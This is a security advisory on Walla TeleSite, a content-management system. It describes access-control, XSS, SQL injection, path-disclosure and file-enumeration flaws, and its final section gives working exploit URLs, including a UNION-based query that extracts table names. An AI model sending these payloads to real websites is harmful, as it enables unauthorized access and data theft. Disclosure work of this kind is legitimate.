~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application: Walla TeleSite Vendors: http://www.walla.co.il Versions: 3.0 and perior Platforms: Windows (ISAPI, a few vulnerabilities apply Linux too) Bug: Multiple Vulnerabilities Exploitation: Remote with browser Date: 13 Nov 2005 Author: Rafi Nahum, Pokerface e-mail: rafiware@bezeqint.net web: Not Yet....but soon ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 1) Introduction 2) Bugs 3) The Code ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =============== 1) Introduction =============== Walla TeleSite is a Website Content Managment CGI web application. It is very common amoung big israeli websites. It also used as a wrapper to all the website links. It is also used by Walla.co.il and the Walla.com Network. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ====== 2) Bug ====== The TeleSite wraps the website with templates and ids to all the links. The main navigation page ts.exe receives a parameter called 'tsurl' and it does not verifies/limits the numbers it receives, for example it should receive 0.22.1.0 if there is such a page, but it shouldn't 0.1.0.0 because it leads to the private articles menu of administrator. In addition, further input filtering is missing in the webpages Get/Post/Cookie parameters, this is a "feature" missing to this software which causes the web programmers using this website content managment engine to think their parameters are filtered, well they are'nt and this causes all their clients to have Script and SQL Injections. Where it is obvious that an SQL Injection may lead to complete remote compromise if the website and XSS to content spoofing, phishing, cookie stealing, D.O.S attacks and more. The TeleSite application also does not saves the errors to itself...in an error.log or something similar, it informs the attacker with the local path of the files it could not open/access when the attacker tempares with the website parameters. A remote attacker can also enumerate all the files on the machine by supplying their full path to ts.cgi after the querystring. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =========== 3) The Code =========== Articles Menu Access: -------------------------------- http://host/ts.exe?tsurl=0.1.0.0 Cross Site Scripting - XSS: -------------------------------------- http://host/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20<scr ipt>alert()</script> Blind SQL Injection: ----------------------------- Proof Of Concept: http://host/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20and% 20'1'='1 http://host/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20and% 20'1'='2 Exploitation: http://host/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%EF'%20or%201=1%2 0union%20all%20select%20top%201%20null,null,null,null,null,null,null,null,nu ll,'nuli','zulu','papa','qqq','rar','ewe',table_name,'asd','ttt','werwr','ry y','poo','polo','nike'%20from%20information_schema.columns-- Local Path Disclosure: ------------------------------- D:\TeleSite\online\templates\\example\sections\header Local File Enumeration: --------------------------------- http://host/ts.cgi?c:\boot.ini http://host/ts.cgi?c:\boot1.ini ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Rafi Nahum, Pokerface Greetings to The-Insider "Pokerface is the name, reputation follows."